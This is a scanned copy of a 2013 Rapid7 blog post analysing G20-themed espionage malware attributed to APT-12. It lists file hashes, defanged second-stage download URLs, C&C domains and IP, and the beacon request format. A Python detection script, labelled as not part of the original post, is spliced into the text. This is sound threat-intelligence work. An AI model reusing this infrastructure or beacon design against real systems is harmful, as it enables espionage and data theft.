www.rapid7.com
52.222.214.15
Public Scan
Submitted URL: https://community.rapid7.com/community/infosec/blog/2013/08/26/upcoming-g20-summit-fuels-espionage-operations
Effective URL: https://www.rapid7.com/blog/post/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
Submission: On December 09 via api from US — Scanned from DE
Form analysis
6 forms found in the DOM
Text Content
UPCOMING G20 SUMMIT FUELS ESPIONAGE OPERATIONS
Aug 26, 2013 - 9 min read - nex

The international policy and financial community is in ferment for the upcoming G-20 summit, scheduled to kick-off in St Petersburg, Russia, in two weeks from now.
The "Group of Twenty" consists of political leaders, finance ministers and bank governors from 19 economically prominent countries, along with representatives of European Union institutions. Since the global crisis of 2007, the group has met every year, beginning in 2008, in private meetings where the participants discuss and agree on international financial regulations. G-20 Summits represent a major event for the global community and attract the interest and attention of organizations and individuals worldwide. Not surprisingly, this includes espionage groups.

A swarm of G-20 themed attacks has been rising in the last weeks, intensifying as we get closer to the Summit. Multiple intrusion groups, potentially originating from China and long tracked by threat researchers, have been identified operating such attacks, likely directed at government and financial institutions. In this blog post we'll walk through some of the incidents we have observed so far and describe the tactics and tools the adversaries have been (and likely still are) using for these campaigns.

CALC TEAM

The first intrusion group I'm going to cover is one of the "favorites" in the large pool of targeted attack operators, and possibly one of the most prolific and established ones. This group goes by multiple names, but it's widely known as Calc Team, or APT-12 as labelled by security firm Mandiant. You should have heard of these guys a few months ago, as they have been blamed for the New York Times hack. Within the security community there's a firm belief that the Calc Team is an espionage group operating from China, which originally stood out due to a peculiar algorithm used to calculate the connection details of its Command & Control (C&C) servers out of an initial DNS request. The group has been tracked by researchers for years and is believed to be responsible for numerous attacks against government agencies, financial institutions and defense contractors.
Despite staying silent for months, possibly due to the attention raised after the New York Times incident, security firm FireEye very recently observed and described the return of the team with evolved tactics and tools. The indicators provided by FireEye largely match the attacks that I'm going to describe in the following paragraphs, so it seems likely that the attacks described here originate from the same intrusion group.

INCIDENT PROFILES

Before looking at the details of the malware, let's walk through the attacks that we identified as belonging to this ongoing campaign and start connecting the dots. All the cases that I'm going to cover here share the following attributes:

* The malware involved in all the attacks was delivered within a Zip archive; no exploit was apparently involved.
* All the attacks used the upcoming G20 as a theme for the bait.
* All the attacks had their malware contact domains pointing to the same host, 23.19.122.231.
* All the malicious files used in the attacks belong to the same malware family and behave in the same way.

ATTACK #1 - MAY 2013

The first symptoms of an ongoing G20-themed campaign showed on May 31st, when a Canadian user uploaded this file to VirusTotal:

File Name: G20 Briefing Papers.zip
MD5: 08d98a9c1d01429290656b471e2e838d
SHA256: 7caba5616e935b28af47fa872e25b6abed646cc3ceec10af733f0f375eeea157

Following are the attributes of the two malware samples contained in that archive:

File Name: G20 Discussion Paper.exe
MD5: 12b0e0525c4dc2510a26d4f1f2863c75
SHA256: 4fd0c6187360c628be002f8556b04856b3166ecd6a193f4885d7f85fca0cb43f
Domain Contacted: status.acmetoy.com

File Name: GPFI Work Plan 2013.exe
MD5: 96c28bddba400ddc9a4b12d6cc806aa3
SHA256: 689be4fa4158ab2980030fa0cb3ffd42df51293d6f38d11c0b32804cfd28a2ac
Domain Contacted: status.acmetoy.com

Both are clearly Windows executable files that try to disguise themselves as PDF documents.
As commonly happens, no exploit was used here: the attacker relied solely on social engineering the targets into opening and executing the files contained in the archive. As you can see, they both contact the domain status.acmetoy.com, which was linked to a different incident and attributed to APT-12 in FireEye's blog post. Upon execution, both files extract an actual embedded PDF to the %Temp% folder and display it to the victim, in order not to raise suspicion. This is the document embedded in the first file:

This document contains details about the development plan of the Russian Presidency in preparation for the upcoming G20 Summit. It includes a calendar of scheduled activities from December 2012 until November 2013. It seems to be a copy of a legitimate document originally available from the website of an American think tank.

The second executable embeds the following document:

As described on its website, the "Global Partnership for Financial Inclusion (GPFI) is an inclusive platform for all G20 countries, interested non-G20 countries and relevant stakeholders to carry forward work on financial inclusion, including implementation of the Financial Inclusion Action Plan, endorsed at the G20 Summit in South Korea". The picture shows an embedded copy of the GPFI's work plan for the current year, originally available here.

ATTACK #2 - AUGUST 2013

On August 16th, VirusTotal received a submission from France of a Zip archive with the following attributes:

File Name: G20 Summit Paper.zip
MD5: fb6a39a9d3bad1843bafad1c4eeebb6c
SHA256: 8206594eeedf284b8e06caeceae43b8a549e0051bf51d29a37f60c6304926a49

As is traditional with the modus operandi of these intrusion groups, we can expect this archive to have been delivered through a crafted spearphishing email to selected targets.
The archive contained two additional files with the following attributes:

File Name: G20 Summit Improving global confidence and support the globa.EXE
MD5: 1873b369794470f9a3bcc0458d373948
SHA256: a1f65f38b1fd4d74956ff1c91a2c4d5f57a1d0abab87b8a4b2ec7a45bb34c80e
Domain Contacted: status.mefound.com

File Name: Improving global confidence and support.pdf.exe
MD5: c5ff4c5145e2a7c6b8b9599b90176deb
SHA256: 82fae28267c935c170a97885bd968c2a89e8bd3974d558b6aa9a4ad1670249a4
Domain Contacted: status.mefound.com

Following is a screenshot of the document embedded in the first sample:

As you can see, the document appears to be a memo from the European Council regarding the upcoming G20 meeting and the participation of the Council's President Herman Van Rompuy and the European Commission's President José Manuel Barroso. Interestingly, the document is actually a legitimate press release from the European Council, originally available here.

The second sample in the archive embeds a very similar document, which looks like this:

In this case it appears to be a letter from the previously mentioned presidents of the European Council and the European Commission, discussing the agenda items for the upcoming G20 Summit. Again, this is a copy of a legitimate memo from the European Commission that you can read here. As you can see, it anticipates that the following points will be presented and discussed at the summit:

1. Growth and employment need to be at the top of the G20 agenda
2. Completing financial regulatory reform
3. Push forward the work on tax avoidance and evasion
4. Completing the reform of the International Financial Architecture and progressing with our work on Development, Anticorruption and Energy

Considering the context and the content of these documents, we can assume that the attackers are going after members of European institutions somewhat involved in financial policy making.
ATTACK #3 - AUGUST 2013

On August 21st, a few hours before I began this writeup, VirusTotal received another related submission, this time from Hungary. Following are its attributes:

File Name: The list of NGOs representatives accredited at the Press Center of The G20 Leaders' Summit 2013.pdf.exe
MD5: 5729fb35392b068d845b1a19c51164b8
SHA256: 0ea53aa4d7c9ee05d873df4998f27d5642edbb9523c421d258ed1acef81b6202
Domain Contacted: g20russian.tk

This sample belongs to the same family as the two previously mentioned. The content of the bait still revolves around the G20 Summit:

In this case the malware embeds a list of representatives of Non-Government Organizations that have been granted access to the G20 Summit's Press Center. Yet again this document is a copy of an original legitimate one, available here. It's harder to estimate the nature of the target for this incident, as the mention of NGOs leaves space for a wide variety of options and speculation.

BACKDOOR

After having opened the PDF, the initial dropper copies itself to %Temp%\AcroRd32.exe, executes the copy with the argument "again" and exits. When executed with that argument, the malware initiates its main procedure, which mainly takes care of:

1. Attempting to download and execute additional malware
2. Logging keystrokes

Clearly, these samples are just the initial stage of a larger suite of malware, possibly including Aumlib and Ixeshe, which they will try to download from a fixed list of URLs embedded in the binary. In the cases observed so far, those URLs are:

hxxp://status.acmetoy.com/DD/favicon.iso
hxxp://status.acmetoy.com/DD/favicon.iso
hxxp://status.acmetoy.com/DD/favicon.iso
hxxp://status.mefound.com/DD815/favicon.ico
hxxp://status.mefound.com/DD815/css.css
hxxp://status.mefound.com/DD815/google-min.js
hxxp://G20russian.tk/1H820/favicon.ico
hxxp://G20russian.tk/1H820/css.css
hxxp://G20russian.tk/1H820/google-min.js

As you can see, they all use some recurring file paths.
While this download procedure runs on a separate thread, the malware continues into its main procedure by initiating its keylogging functionality. In order to intercept keystrokes, the malware constantly loops through an embedded list of keys and checks the state of each key with the GetKeyState Windows API. Whenever a key appears to be pressed, the malware logs the event along with a timestamp.

The malware performs some HTTP requests to its C&C host in order to check in with the backend and report status messages:

GET /url.asp?<attack ID>-ShowNewsID-<computer name>=<base64-encoded data> HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: <domain>
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Tue, 20 Aug 2013 17:02:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: <cookie>; path=/
Cache-control: private

All the malware binaries covered so far contact domains that resolved to the same IP address, which appears to be a cloud or dedicated server rented from UbiquityServers: 23.19.122.231

NetRange: 23.19.120.0 - 23.19.123.255
CIDR: 23.19.120.0/22
OriginAS: AS15003
NetName: NETBLK-UBIQUITY-CHICAGO-23-19-120-0
NetHandle: NET-23-19-120-0-1
OrgName: Ubiquity Server Solutions Chicago
OrgId: NTGL-1
Address: 350 East Cermak Road
City: Chicago
StateProv: IL
PostalCode: 60616
Country: US

Along with the ones already mentioned, the following domains appear to resolve to the same IP address, some of them connected to other attacks (such as this):

serial.ddns.ms
getfresh.dnsrd.com
status.acmetoy.com
serial.ddns.ms
googles.almostmy.com
newsdaily.flashserv.net
googleupdating.tk

All these domains are either provided by the ChangeIP dynamic DNS service or by the Dot.tk free domain registrar, therefore there is no whois information that can be used for additional correlation.
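As an added example (not code from the post or from Rapid7), the following Python script turns the check-in URI pattern, the recurring second-stage file paths and the C&C indicators listed above into a detector that runs over proxy-log lines; the log format and the sample lines are constructed assumptions for the example, not captured traffic.

```python
import base64
import binascii
import re
import shlex
from dataclasses import dataclass, field

# Indicators as published in the post: the C&C IP and the domains seen resolving to it.
C2_IP = "23.19.122.231"
C2_DOMAINS = {
    "status.acmetoy.com", "status.mefound.com", "g20russian.tk",
    "serial.ddns.ms", "getfresh.dnsrd.com", "googles.almostmy.com",
    "newsdaily.flashserv.net", "googleupdating.tk",
}
# User-Agent hard-coded in the check-in request; common on its own, so it only adds weight.
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"

# GET /url.asp?<attack ID>-ShowNewsID-<computer name>=<base64-encoded data>
BEACON_RE = re.compile(
    r"^/url\.asp\?(?P<attack_id>[^-]+)-ShowNewsID-(?P<computer>[^=]+)=(?P<data>[A-Za-z0-9+/]+=*)$"
)
# Second-stage download URLs: one directory, then one of the recurring file names.
STAGE2_RE = re.compile(r"^/[A-Za-z0-9]+/(favicon\.ico|favicon\.iso|css\.css|google-min\.js)$")


@dataclass
class Finding:
    client: str
    host: str
    uri: str
    reasons: list = field(default_factory=list)
    attack_id: str = ""
    computer: str = ""
    decoded: bytes = b""


def parse_line(line):
    """Split one constructed log line: ts client method host uri "user-agent" (assumed format)."""
    try:
        parts = shlex.split(line)
    except ValueError:
        return None
    if len(parts) != 6:
        return None
    ts, client, method, host, uri, ua = parts
    return {"ts": ts, "client": client, "method": method, "host": host.lower(), "uri": uri, "ua": ua}


def analyze_request(client, host, uri, ua):
    """Return a Finding when the request matches the beacon, a stage-2 fetch or known infrastructure."""
    f = Finding(client=client, host=host, uri=uri)
    if host in C2_DOMAINS or host == C2_IP:
        f.reasons.append("known C&C domain or IP")
    m = BEACON_RE.match(uri)
    if m:
        f.reasons.append("check-in URI pattern /url.asp?<id>-ShowNewsID-<host>=<b64>")
        f.attack_id = m.group("attack_id")
        f.computer = m.group("computer")
        try:
            f.decoded = base64.b64decode(m.group("data"), validate=True)
        except (binascii.Error, ValueError):
            f.reasons.append("data field is not valid base64")
    elif STAGE2_RE.match(uri):
        f.reasons.append("second-stage download path")
    # The UA is only reported alongside another signal; alone it is far too common to alert on.
    if f.reasons and ua == BEACON_UA:
        f.reasons.append("hard-coded beacon User-Agent")
    return f if f.reasons else None


def scan_log(lines):
    """Run analyze_request over every parseable line and collect the findings."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        f = analyze_request(rec["client"], rec["host"], rec["uri"], rec["ua"])
        if f:
            findings.append(f)
    return findings


# Constructed sample lines (not real traffic): a check-in, a stage-2 fetch, a benign
# favicon request that must not match, and a plain hit on the C&C IP.
SAMPLE_LOG = [
    '2013-08-20T17:02:04Z 10.0.0.5 GET status.mefound.com /url.asp?DD815-ShowNewsID-WKSTN01=V0tTVE4wMXxvaw== "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"',
    '2013-08-20T17:02:05Z 10.0.0.5 GET status.mefound.com /DD815/google-min.js "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"',
    '2013-08-20T17:02:06Z 10.0.0.7 GET www.example.com /favicon.ico "Mozilla/5.0 (Windows NT 6.1) Firefox/23.0"',
    '2013-08-20T17:02:07Z 10.0.0.9 GET 23.19.122.231 /index.html "Mozilla/5.0 (Windows NT 6.1) Firefox/23.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit.client, hit.host, hit.uri, "|", "; ".join(hit.reasons), "|", hit.decoded)
```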
VirusTotal provides a thorough overview of the activity it observed associated with 23.19.122.231. It's interesting to note that the C&C also appears to have a Remote Desktop server open on port 3389. At the time of writing, the C&C appears to still be operative.

CONCLUSIONS

Assuming that the chain of attribution to Calc is correct, it's interesting to observe that, despite major international exposure after the New York Times incident, the intrusion group (or groups) behind these attacks is still operational and doesn't seem to have been affected by the sudden attention received from newspapers and researchers. Unfortunately we have no visibility into the result of the attacks and whether the operators managed to be successful, but it's remarkable that, despite the high profile of the average target of these espionage operations, the tactics and tools adopted are not as sophisticated as one would expect. As also pointed out by FireEye, the creators of the malware seem to be actively changing things around in order to avoid detection by network defense layers; combined with the lack of exploitation involved, this leaves a large responsibility on the targeted user to recognize the social engineering attempt and isolate the attack.

UPCOMING

While this group of attacks seems one of the most prolific, there are others adopting similar tactics and launching G20 Summit-themed attacks. In the following days, we'll report on a second ongoing campaign using slightly different methods, but likely targeting very similar kinds of victim.

--------------------------------------------------------------------------------

This research was brought to you by Claudio "nex" Guarnieri from Rapid7 Labs.
References:
* "Hackers in China Attacked The Times for Last 4 Months", New York Times
* "Chinese hackers attacked New York Times computers for four months", Ars Technica
* "Survival of the Fittest: New York Times Attackers Evolve Quickly", FireEye Blog
* "status.acmetoy.com Domain Information", VirusTotal
* "Revamped Aumlib, Ixeshe Malware Found in New China Attacks", ThreatPost
* "Analysis of aafc620d6f0f0fec2234ea1e605402a6", Malwr
* "23.19.122.231 IP address information", VirusTotal